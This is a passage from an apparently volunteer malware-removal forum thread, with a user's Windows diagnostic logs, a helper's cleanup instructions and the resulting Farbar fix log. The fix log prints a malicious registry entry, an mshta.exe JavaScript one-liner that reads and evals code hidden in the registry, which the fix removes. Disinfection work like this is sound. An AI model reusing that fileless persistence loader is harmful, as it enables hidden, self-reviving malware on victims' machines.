Faulting application path: C:\Windows\system32\svchost.exe
Faulting module path: C:\Windows\system32\ole32.dll
Report Id: e72bad1a-a8dc-11e6-95c8-382c4abaa96d
 
Error: (11/12/2016 07:26:24 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
 
Error: (11/11/2016 09:28:04 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
 
Error: (11/10/2016 10:52:19 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
 
Error: (11/10/2016 05:31:45 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
 
Error: (11/10/2016 03:17:10 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
 
Error: (11/10/2016 12:15:47 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
 
Error: (11/10/2016 06:13:43 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
 
Error: (11/09/2016 05:31:13 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
 
 
System errors:
=============
Error: (11/12/2016 03:57:19 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.
 
Error: (11/12/2016 09:32:18 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 20.
 
Error: (11/12/2016 09:07:31 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 20.
 
Error: (11/12/2016 07:34:48 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 20.
 
Error: (11/11/2016 09:32:20 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 20.
 
Error: (11/11/2016 09:02:10 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 20.
 
Error: (11/11/2016 08:56:36 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 40.
 
Error: (11/11/2016 06:59:37 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 20.
 
Error: (11/11/2016 06:24:10 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 20.
 
Error: (11/11/2016 05:19:51 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 20.
 
 
==================== Memory info =========================== 
 
Processor: AMD FX™-4300 Quad-Core Processor 
Percentage of memory in use: 31%
Total physical RAM: 7918.12 MB
Available physical RAM: 5450.94 MB
Total Virtual: 15834.42 MB
Available Virtual: 12710.45 MB
 
==================== Drives ================================
 
Drive c: () (Fixed) (Total:931.41 GB) (Free:858.92 GB) NTFS
Drive e: (Lexar) (Removable) (Total:7.32 GB) (Free:7.01 GB) FAT32
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 60293210)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=931.4 GB) - (Type=07 NTFS)
 
========================================================
Disk: 1 (MBR Code: Windows XP) (Size: 7.3 GB) (Disk ID: C3072E18)
Partition 1: (Active) - (Size=7.3 GB) - (Type=0C)
 
==================== End of Addition.txt ============================
 
Whatever you can do to help would be appreciated.  Thanks!
Dale

 


  • 0

Advertisements

#2
zep516
Posted 12 November 2016 - 06:16 PM

zep516

    Trusted Helper

  • Malware Removal
  • 8,093 posts
Hi! My name is zep516 and Welcome to Geekstogo!
I'll do the best I can to resolve your computer issue
Please make sure to carefully read any instruction that I give you. If you're not sure, or if something unexpected happens, don't continue Stop and ask! Never be afraid to ask questions! :)


Download the enclosed => file. Attached File  fixlist.txt   10.92KB   156 downloads Save it in the location FRST64 is. (C:\Users\Dale\Downloads). Run FRST and click on the Fix button. Wait until finished.

The tool will make a log in the location FRST is, (C:\Users\Dale\Downloads) (Fixlog.txt). Please post it to your reply.

Next

Please download adwCleaner to your desktop.
  • Close all open programs and internet browsers.
  • Double click on AdwCleaner.exe to run the tool.
  • Click the Scan button and wait for the process to complete.
  • Click the logfile button and the log will open in Notepad.
  • Click on the Clean button follow the prompts.
  • A log file will automatically open after the scan has finished and the PC has rebooted.
  • Please post the content of that log file with your next answer.
  • The report will be saved in the C:\AdwCleaner folder.

    Next
    Please download Junkware Removal Tool to your Desktop.
    Please close your security software to avoid potential conflicts. See Here how to disable you security protection (Anti Virus)
    Run the tool by double-clicking it. If you are using Windows Vista or 7, right-mouse click it and select Run as administrator.
    The tool will open and start scanning your system.
    Please be patient as this can take a while to complete, depending on your system's specifications.
    On completion, a log (JRT.txt) is saved to your Desktop and will automatically open.
    Please post the contents of JRT.txt into your reply.

    Next

  • Please download Malwarebytes Anti-Malware to your desktop.
  • Double-click mbam-setup-version.exe and follow the prompts to install the program.
  • Launch Malwarebytes Anti-Malware
  • Then click Finish.
  • If an update is found, you will be prompted to download and install the latest version.
  • Once the program has loaded, select Scan now. Or select the Threat Scan from the Scan menu.
  • When the scan is complete , make sure that that all Threats are selected, and click Remove Selected.
  • Reboot your computer if prompted.


    Posting the Malwarebytes log.

  • After the restart once you are back at your desktop, open MBAM once more.
  • Click on the History tab > Application Logs.
  • Double click on the Scan Log which shows the Date and time of the scan just performed.
  • Click 'Export'.
  • Click 'Text file (*.txt)'
  • In the Save File dialog box which appears, click on Desktop.
  • In the File name: box type a name for your scan log.
  • A message box named 'File Saved' should appear stating "Your file has been successfully exported".
  • Click Ok
  • post that saved log to your next reply.

    In your next reply post;
  • The Fixlog.txt
  • The AdwCleaner [C1].txt Log
  • The JRT.txt Log
  • Malwarebytes log









  • 0

#3
dalemccollum
Posted 12 November 2016 - 07:43 PM

dalemccollum

    New Member

  • Topic Starter
  • Member
  • Pip
  • 4 posts

Hi Zep516.  Thanks for the help.  Here are the logs you requested:

 

Fix result of Farbar Recovery Scan Tool (x64) Version: 12-11-2016
Ran by Dale (12-11-2016 18:39:26) Run:1
Running from C:\Users\Dale\Desktop
Loaded Profiles: Dale (Available Profiles: Dale)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
CloseProcesses:
CreateRestorePoint:
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-2722837513-1420934957-2528714982-1000\...\Run: [**kunlt<*>] => "C:\Users\Dale\AppData\Local\e2f44a7\015e8c8.lnk" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-2722837513-1420934957-2528714982-1000\...\Policies\Explorer: [NoInstrumentation] 1
Toolbar: HKU\S-1-5-21-2722837513-1420934957-2528714982-1000 -> No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  No File
S3 NAVENG; \??\C:\Program Files (x86)\Norton Security\NortonData\22.7.0.76\Definitions\SDSDefs\20160626.001\ENG64.SYS [X]
S3 NAVEX15; \??\C:\Program Files (x86)\Norton Security\NortonData\22.7.0.76\Definitions\SDSDefs\20160626.001\EX64.SYS [X]
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00030839.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00030226.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00029972.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00029940.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00029918.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00029280.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00029158.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00028963.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00027846.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00027322.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00026541.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00025928.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00025805.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00025163.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00025012.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00024788.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00024253.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00022551.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00021551.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00020768.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00020508.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00020099.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00019906.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00019714.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00019083.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00019001.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00018937.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00018628.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00018240.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00018051.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00017376.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00017295.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00016852.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00016814.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00016673.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00016164.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00015783.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00015280.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00015234.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00015151.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00014974.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00014820.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00014220.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00014157.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00013284.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00012867.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00012802.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00012309.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00011535.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00011478.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00011376.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00010774.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00010023.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00009671.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00009339.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00009267.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00009059.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00009043.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00007802.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00007557.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00007344.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00007009.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00005240.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00004889.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00004142.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00004097.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00003941.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00002180.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00001474.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00001240.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00001024.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00032574.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00032524.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00030824.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00029806.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00028199.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00026446.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00026097.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00025861.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00023992.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00023161.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00022803.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00021890.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00021069.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00020921.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00019675.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00019576.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00019116.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00017533.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00016828.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00012032.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00012012.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00009045.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00007928.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00007865.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00004833.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00004177.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00004028.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00002376.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00001229.tmp
C:\Users\Dale\QDATAOFXLOG.DAT
C:\Users\Dale\QDATAOFXOLD.DAT
Task: {2F57269B-1E09-4E2D-AB1E-B0FDAC7D279C} - \Microsoft\Windows\WindowsBackup\ConfigNotification -> No File <==== ATTENTION
Task: {93188D78-690F-4D0C-883C-D3A8B7FAABAC} - \Microsoft\Windows\Windows Activation Technologies\ValidationTask -> No File <==== ATTENTION
Task: {AC4E5ACF-89F7-4220-BA21-81EE183975E2} - \Microsoft\Windows\Application Experience\AitAgent -> No File <==== ATTENTION
Task: {CEE64558-E1A7-4D9D-80A7-2001912BE5B5} - \Microsoft\Windows\MemoryDiagnostic\CorruptionDetector -> No File <==== ATTENTION
Task: {E53E44FB-9B83-426E-A9FB-B394E57995A5} - \Microsoft\Windows\Windows Activation Technologies\ValidationTaskDeadline -> No File <==== ATTENTION
Task: {FA2BC0A6-8D4B-458A-85C8-2B8C72487513} - \Microsoft\Windows\MemoryDiagnostic\DecompressionFailureDetector -> No File <==== ATTENTION
Shortcut: C:\Users\Dale\AppData\Local\e2f44a7\015e8c8.lnk -> C:\Users\Dale\AppData\Local\e2f44a7\02ab8e0.bat ()
AlternateDataStreams: C:\ProgramData\TEMP:792D4CF1 [169]
Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
HKU\S-1-5-21-2722837513-1420934957-2528714982-1000\Software\Classes\3e97b17: "C:\Windows\system32\mshta.exe" "javascript:b5dsr0N="j7b";Q80T=new ActiveXObject("WScript.Shell");APdJ5x9="j";G8WHH=Q80T.RegRead("HKCU\\software\\qwgcellmqw\\wgis");kmh2VOPj="aKOOEp";eval(G8WHH);l4KSR8="JdLe8SE";" <===== ATTENTION
DeleteKey:HKU\S-1-5-21-2722837513-1420934957-2528714982-1000\Software\Classes\3e97b17 
DeleteKey:HKCU\\software\\qwgcellmqw
CMD: bitsadmin /reset /allusers
CMD: netsh winsock reset catalog
CMD: ipconfig /flushdns
RemoveProxy:
hosts:
Emptytemp:
*****************
 
Processes closed successfully.
Restore point was successfully created.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => value removed successfully
HKU\S-1-5-21-2722837513-1420934957-2528714982-1000\Software\Microsoft\Windows\CurrentVersion\Run\\**kunlt<*> => value removed successfully
HKU\S-1-5-21-2722837513-1420934957-2528714982-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoInstrumentation => value removed successfully
HKU\S-1-5-21-2722837513-1420934957-2528714982-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{2318C2B1-4965-11D4-9B18-009027A5CD4F} => value removed successfully
HKCR\CLSID\{2318C2B1-4965-11D4-9B18-009027A5CD4F} => key not found. 
NAVENG => service could not remove
NAVEX15 => service could not remove
"C:\Windows\SysWOW64\00030839.tmp" => not found.
"C:\Windows\SysWOW64\00030226.tmp" => not found.
"C:\Windows\SysWOW64\00029972.tmp" => not found.
"C:\Windows\SysWOW64\00029940.tmp" => not found.
"C:\Windows\SysWOW64\00029918.tmp" => not found.
"C:\Windows\SysWOW64\00029280.tmp" => not found.
"C:\Windows\SysWOW64\00029158.tmp" => not found.
"C:\Windows\SysWOW64\00028963.tmp" => not found.
"C:\Windows\SysWOW64\00027846.tmp" => not found.
"C:\Windows\SysWOW64\00027322.tmp" => not found.
"C:\Windows\SysWOW64\00026541.tmp" => not found.
"C:\Windows\SysWOW64\00025928.tmp" => not found.
"C:\Windows\SysWOW64\00025805.tmp" => not found.
"C:\Windows\SysWOW64\00025163.tmp" => not found.
"C:\Windows\SysWOW64\00025012.tmp" => not found.
"C:\Windows\SysWOW64\00024788.tmp" => not found.
"C:\Windows\SysWOW64\00024253.tmp" => not found.
"C:\Windows\SysWOW64\00022551.tmp" => not found.
"C:\Windows\SysWOW64\00021551.tmp" => not found.
"C:\Windows\SysWOW64\00020768.tmp" => not found.
"C:\Windows\SysWOW64\00020508.tmp" => not found.
"C:\Windows\SysWOW64\00020099.tmp" => not found.
"C:\Windows\SysWOW64\00019906.tmp" => not found.
"C:\Windows\SysWOW64\00019714.tmp" => not found.
"C:\Windows\SysWOW64\00019083.tmp" => not found.
"C:\Windows\SysWOW64\00019001.tmp" => not found.
"C:\Windows\SysWOW64\00018937.tmp" => not found.
"C:\Windows\SysWOW64\00018628.tmp" => not found.
"C:\Windows\SysWOW64\00018240.tmp" => not found.
"C:\Windows\SysWOW64\00018051.tmp" => not found.
"C:\Windows\SysWOW64\00017376.tmp" => not found.
"C:\Windows\SysWOW64\00017295.tmp" => not found.
"C:\Windows\SysWOW64\00016852.tmp" => not found.
"C:\Windows\SysWOW64\00016814.tmp" => not found.
"C:\Windows\SysWOW64\00016673.tmp" => not found.
"C:\Windows\SysWOW64\00016164.tmp" => not found.
"C:\Windows\SysWOW64\00015783.tmp" => not found.
"C:\Windows\SysWOW64\00015280.tmp" => not found.
"C:\Windows\SysWOW64\00015234.tmp" => not found.
"C:\Windows\SysWOW64\00015151.tmp" => not found.
"C:\Windows\SysWOW64\00014974.tmp" => not found.
"C:\Windows\SysWOW64\00014820.tmp" => not found.
"C:\Windows\SysWOW64\00014220.tmp" => not found.
"C:\Windows\SysWOW64\00014157.tmp" => not found.
"C:\Windows\SysWOW64\00013284.tmp" => not found.
"C:\Windows\SysWOW64\00012867.tmp" => not found.
"C:\Windows\SysWOW64\00012802.tmp" => not found.
"C:\Windows\SysWOW64\00012309.tmp" => not found.
"C:\Windows\SysWOW64\00011535.tmp" => not found.
"C:\Windows\SysWOW64\00011478.tmp" => not found.
"C:\Windows\SysWOW64\00011376.tmp" => not found.
"C:\Windows\SysWOW64\00010774.tmp" => not found.
"C:\Windows\SysWOW64\00010023.tmp" => not found.
"C:\Windows\SysWOW64\00009671.tmp" => not found.
"C:\Windows\SysWOW64\00009339.tmp" => not found.
"C:\Windows\SysWOW64\00009267.tmp" => not found.
"C:\Windows\SysWOW64\00009059.tmp" => not found.
"C:\Windows\SysWOW64\00009043.tmp" => not found.
"C:\Windows\SysWOW64\00007802.tmp" => not found.
"C:\Windows\SysWOW64\00007557.tmp" => not found.
"C:\Windows\SysWOW64\00007344.tmp" => not found.
"C:\Windows\SysWOW64\00007009.tmp" => not found.
"C:\Windows\SysWOW64\00005240.tmp" => not found.
"C:\Windows\SysWOW64\00004889.tmp" => not found.
"C:\Windows\SysWOW64\00004142.tmp" => not found.
"C:\Windows\SysWOW64\00004097.tmp" => not found.
"C:\Windows\SysWOW64\00003941.tmp" => not found.
"C:\Windows\SysWOW64\00002180.tmp" => not found.
"C:\Windows\SysWOW64\00001474.tmp" => not found.
"C:\Windows\SysWOW64\00001240.tmp" => not found.
"C:\Windows\SysWOW64\00001024.tmp" => not found.
"C:\Windows\SysWOW64\00032574.tmp" => not found.
"C:\Windows\SysWOW64\00032524.tmp" => not found.
"C:\Windows\SysWOW64\00030824.tmp" => not found.
"C:\Windows\SysWOW64\00029806.tmp" => not found.
"C:\Windows\SysWOW64\00028199.tmp" => not found.
"C:\Windows\SysWOW64\00026446.tmp" => not found.
"C:\Windows\SysWOW64\00026097.tmp" => not found.
"C:\Windows\SysWOW64\00025861.tmp" => not found.
"C:\Windows\SysWOW64\00023992.tmp" => not found.
"C:\Windows\SysWOW64\00023161.tmp" => not found.
"C:\Windows\SysWOW64\00022803.tmp" => not found.
"C:\Windows\SysWOW64\00021890.tmp" => not found.
"C:\Windows\SysWOW64\00021069.tmp" => not found.
"C:\Windows\SysWOW64\00020921.tmp" => not found.
"C:\Windows\SysWOW64\00019675.tmp" => not found.
"C:\Windows\SysWOW64\00019576.tmp" => not found.
"C:\Windows\SysWOW64\00019116.tmp" => not found.
"C:\Windows\SysWOW64\00017533.tmp" => not found.
"C:\Windows\SysWOW64\00016828.tmp" => not found.
"C:\Windows\SysWOW64\00012032.tmp" => not found.
"C:\Windows\SysWOW64\00012012.tmp" => not found.
"C:\Windows\SysWOW64\00009045.tmp" => not found.
"C:\Windows\SysWOW64\00007928.tmp" => not found.
"C:\Windows\SysWOW64\00007865.tmp" => not found.
"C:\Windows\SysWOW64\00004833.tmp" => not found.
"C:\Windows\SysWOW64\00004177.tmp" => not found.
"C:\Windows\SysWOW64\00004028.tmp" => not found.
"C:\Windows\SysWOW64\00002376.tmp" => not found.
"C:\Windows\SysWOW64\00001229.tmp" => not found.
C:\Users\Dale\QDATAOFXLOG.DAT => moved successfully
C:\Users\Dale\QDATAOFXOLD.DAT => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{2F57269B-1E09-4E2D-AB1E-B0FDAC7D279C}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2F57269B-1E09-4E2D-AB1E-B0FDAC7D279C}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\WindowsBackup\ConfigNotification" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{93188D78-690F-4D0C-883C-D3A8B7FAABAC}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{93188D78-690F-4D0C-883C-D3A8B7FAABAC}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Windows Activation Technologies\ValidationTask" => key removed successfully
